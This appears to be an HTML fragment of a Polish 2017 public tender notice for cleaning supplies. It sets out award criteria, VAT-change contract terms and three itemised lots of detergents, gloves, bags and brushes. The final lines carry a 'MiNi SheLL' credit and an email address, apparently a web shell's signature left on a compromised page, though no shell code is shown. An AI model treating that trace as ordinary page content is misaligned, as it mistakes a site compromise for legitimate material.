              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Strony, mając na uwadze ewentualną zmianę stawek podatku od towarów i usług, zgodnie postanawiają, iż w przypadku ich zmiany na mocy powszechnie obowiązujących przepisów prawa, zmianie  może ulec cena jednostkowa brutto za poszczególny asortyment, przy zachowaniu następujących warunków:
1) w sytuacji podwyższenia stawki podatku od towarów i usług dla danego asortymentu  Wykonawca uprawniony jest do podwyższenia ceny jednostkowej brutto za dany asortyment o różnicę w stawkach podatku od towarów i usług pomiędzy stawką określoną w załączniku do oferty złożonej przez Wykonawcę w toku postępowania przetargowego  Formularzu cenowym, a stawką obowiązującą po zmianie stawki; Wykonawca nie jest uprawniony do podwyższenia ceny jednostkowej brutto za asortyment dostarczony Zamawiającemu przed dniem zmiany stawki podatku;
2) w sytuacji obniżenia stawki podatku od towarów i usług dla danego asortymentu  Wykonawca zobowiązany jest do obniżenia ceny jednostkowej brutto za dany asortyment o różnicę w stawkach podatku od towarów i usług pomiędzy stawką określoną w załączniku do oferty złożonej przez Wykonawcę w toku postępowania przetargowego  Formularzu cenowym, a stawką obowiązującą po zmianie stawki podatku.
W przypadkach określonych w pkt. 1 oraz 2 powyżej, każdorazowo niezmienna pozostaje cena netto danego asortymentu, stanowiąca podstawę do naliczenia podatku od towarów i usług.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 21/03/2017, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie 1  Środki czystości ogólne  część 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Środek odkażająco- dezynfekujący, typu LIZOL, lub równoważny o właściwościach odkażająco  dezynfekujących. Opakowanie 0,5- 1l.  ilość 2300 litrów.
2.	Płyn do usuwania kamienia i rdzy z urządzeń sanitarnych. Opakowanie ok. 0,5 l.  ilość 1400 litrów.
3.	Odświeżacz powietrza w żelu, opakowanie ok.. 150g.  ilość 120 sztuk.
4.	Preparat do pielęgnacji mebli, Opakowanie max. 0,5l.  ilość 420 litrów.
5.	Pasta do obuwia, czarna, w płynie, poj 0,1 l  ilość 10 sztuk.
6.	Tabletki do zmywarki usuwające zabrudzenia z naczyń. Opakowanie od 50 do 300 szt.  ilość 500 sztuk.
7.	Sól do zmywarki, zapobiegająca osadzaniu się kamienia w urządzeniu.. Opakowanie od 1 do 6 kg  ilość 10 kg.
8.	Nabłyszczacz do zmywarki, do płukania i nabłyszczania naczyń. Opakowanie od 1 do 5 litrów  ilość 10 litrów.
9.	Krem do rąk. Opakowanie 50 ml.  ilość 250 sztuk.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39830000-9, 39811300-3,
                    39813000-4,
                    39812200-9,
                    39831210-1,
                    33711540-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>maksymalny termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie 2  Środki czystości ogólne  część 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Papier toaletowy dwuwarstwowy, celulozowy, biały, gofrowany, białość ok. 80%, gramatura nie mniej niż 2x16 g/m2, perforacja co 11 cm, długość nie mniej niż 20 m, szerokość nie mniej niż 9,5 cm, średnica nie mniej niż 11,5 cm, tuleja ok. 45 mm, waga rolki bez tulei nie mniej niż 0,061 kg, tolerancja parametrów +/- 5% - ilość 7000 rolek.
2.	Woreczki HDPE o wym. 26x35 cm, dopuszczone do kontaktu z żywnością. Opakowanie 1000 szt.  ilość 60 opak.
3.	Reklamówka jednorazowa o wym. 25x45 cm. koloru białego, opakowanie 200 szt  ilość 90 opak.
4.	Rękawice foliowe jednorazowe, dopuszczone do kontaktu z żywnością, rozmiar XL (opakowanie 100 szt.)  ilość 1000 opak.
5.	Kubki jednorazowe białe poj. 0,2 l.  ilość 13000 sztuk. 
6.	Ściągaczka do ściągania wody z podłogi z możliwością montażu kija, szerokość 50-75 cm  ilość 250 sztuk.
7.	Szczotka do zamiatania, oprawa plastikowa z otworem do wkręcenia kija, miękkie włosie szer. ok. 30 cm.  ilość 250 sztuk.
8.	Szczotka ryżowa ręczna  ilość 60 sztuk.
9.	Szczotka ryżowa z otworem na kij  ilość 60 sztuk.
10.	Szczotka ręczna z tworzywa sztucznego, odporna na wysoką temperaturę min. 130°C  ilość 60 sztuk.
11.	Szczotka z tworzywa sztucznego do szorowania, z otworem na kij z gwintem  ilość 60 sztuk.
12.	Szczotka "ulicówka" do zamiatania terenów zewnętrznych z otworem na kij szerokość 30  40 cm.  ilość 75 sztuk.
13.	Szczotka plastikowa do czyszczenia WC z podstawą  ilość 220 kompletów.
14.	Kij do miotły i mopa, drewniany z gwintem na końcu, długość ok. 150 cm  ilość 330 sztuk.
15.	Kij do miotły i mopa, metalowy z gwintem na końcu, nieskładany, długość od 150 do 170cm.  ilość 80 sztuk.
16.	Zestaw zmiotka +szufelka  ilość 220 kompletów.
17.	Miska plastikowa okrągła o średnicy 40-50cm, wysokość 15-20 cm  ilość 150 sztuk.
18.	Wiadro plastikowe o pojemności  10l.  ilość 150 sztuk.
19.	Zmywak - gąbka przeznaczona do mycia naczyń. Z jednej strony gąbka, z drugiej materiał umożliwiający szorowanie.  ilość 300 sztuk.
20.	Zestaw do sprzątania: mop sznurkowy + styl + wiadro + wyciskacz  ilość 75 kompletów.
21.	Wkład do mopa sznurkowego  ilość 150 sztuk.
22.	Kosz na śmieci z tworzywa, otwierany nogą tzw. pedałowy o pjemności 25l  ilość 30 sztuk.
23.	Zestaw do sprzątania: stelaż mopa płaskiego + wkład do mopa + styl metalowy nieskładany (wymiary mopa min. 400x100 mm)  ilość 80 kompletów.
24.	Wkład do mopa płaskiego (wymiary mopa min. 400x100 mm)  ilość 100 sztuk.
25.	Wkład do mopa płaskiego (wymiary mopa min. 400x150 mm)  ilość 30 sztuk.
26.	Worki na śmieci koloru czerwonego o poj 60 litrów  ilość 2500 sztuk.
27.	Jednorazowe worki z tworzywa sztucznego na odpady HDPE, worki średnie, w kolorze czarnym, o poj. 60 litrów., 60x71cm., grubość min. 0,010 mm. Ilość worków w rolce: min. 50, PN-EN 13592+A1:2007/AC:2008.  ilość 94200 sztuk.
28.	Jednorazowe worki z tworzywa sztucznego na odpady LDPE, worki duże, grube, w kolorze czarnym lub niebieskim, o poj. 120 litrów, 70x110 cm., grubość min. 0,03 mm. +/-5%,. Ilość worków w rolce: min. 25, PN-EN 13592+A1:2007/AC:2008.  ilość 37200 sztuk.
29.	Rękawice lateksowe o obniżonej zawartości protein (nie więcej niż 80g/g), lekko pudrowane, jednorazowego użytku, niesterylne, pasujące na prawą i lewą rękę. Powierzchnia rękawic bez zgrubień i pęcherzy, rant mankietu równomiernie zrolowany. Dobra elastyczność i rozciągliwość, wysoka odporność na uszkodzenia mechaniczne - siła zrywania po starzeniu min. 7N. AQL 1,5. Grubość rękawicy na palcach 0,12mm +/-0,01mm, w części dłoniowej 0,11mm +/-0,01mm, na mankiecie 0,09mm +/-0,01mm, minimalna długość rękawicy 240mm. Na opakowaniu powinny być umieszczone: data produkcji, termin ważności, numer serii, nazwa i adres producenta, informacje w języku polskim oraz znak CE (zamieszczone fabrycznie na opakowaniu jednostkowym). Rozmiar S- w ilości 6800 szt. tj. 68 opakowań , rozmiar M- w ilości 12000 szt. tj. 120 opakowań, rozmiar L- w ilości 60000 szt. tj. 600 opakowań, XL- w ilości 28000 szt. tj. 280 opakowań. Rękawice zgodne z normami EN 455 część 1, 2, 3 i 4 oraz zaklasyfikowane jako środek ochrony osobistej Kategorii I. Pakowane po 100 szt  ilość 106800 sztuk.
30.	Szczoteczka do zębów dla dorosłych  ilość 200 sztuk.
31.	Ręczniki papierowe jednorazowe, składane ZZ, surowiec makulatura o kolorze naturalnym lub zielonym, 1  warstwowe, gramatura min. 36g/m2, zapach neutralny, nie ulegający pyleniu w stanie suchym, wodotrwały, gofrowany, wymiary listka: 230 mm x 250 mm, waga pakietu min. 0,415 kg., (tolerancja 1%), pakiet min. 200 listków.  ilość 7500 opak.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33760000-5, 19520000-7,
                    18424300-0,
                    39222120-1,
                    39224000-8,
                    39224200-0,
                    39224310-4,
                    39221240-1,
                    39224330-0,
                    39224320-7,
                    39224340-3,
                    19520000-7,
                    33141000-0,
                    33711710-7,
                    33763000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>maksymalny termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zadanie 3  Środki czystości dla bloku kuchennego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Środek do mycia urządzeń sanitarnych w zakładach gastronomicznych. Środek zawierający czynny chlor.  Opakowanie max. 15l.  ilość 1300 litrów.
2.	Neutralny, skoncentrowany środek przeznaczony do ręcznego mycia naczyń w zakładach gastronomii.  Opakowanie max. 15l.  ilość 4000 litrów.
3.	Preparat myjący do rąk usuwający zabrudzenia organiczne i nieorganiczne, antybakteryjny. Nie podrażniający skóry.  Opakowanie max. 15l.  ilość 2500 litrów.
4.	Alkaliczny środek do mycia i dezynfekcji maszyn, ścian,posadzek oraz wszelkich powierzchni produkcyjnych (aluminiowe, ocynkowane, nierdzewne). Preparat zawierający inhibitory korozji, charakteryzujący się działaniem bakteriobójczym, grzybobójczym, nie zawierający aktywnego chloru. Opakowanie max. 15l.  ilość 3500 litrów.
5.	Zasadowy płyn do mycia w zmywarkach,  przyrządów kuchennych, garnków, tac , zawierający aktywny chlor, usuwający resztki jedzenia wszelkiego typu, szczególnie przyschnięte osady z białka i skrobii. (możliwość stosowania w zmywarce WINTERHALTER GS 650. Opakowanie ok. 25l.  ilość 800 litrów.
6.	Środek nabłyszczająco konserwujący, do maszynowego i przemysłowego zastosowania, nie wymagający spłukiwania. Opakowanie max. 15l.  ilość 800 litrów.
7.	Kwaśny środek do mycia i dezynfekcji maszyn, ścian,posadzek (usuwający kamień, rdze, i uciążliwy brud ). Preparat zawierający inhibitory korozji, charakteryzujący się działaniem bakteriobójczym, grzybobójczym. Opakowanie max. 15l.  ilość 300 litrów.
8.	Mleczko do czyszczenia, usuwające brud, kamień, rdzę zawierające substancję ścierną . Opakowanie max. 1 l.  ilość 150 litrów.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39831240-0, 39832000-3,
                    39822000-0,
                    39881210-1,
                    39813000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>maksymalny termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com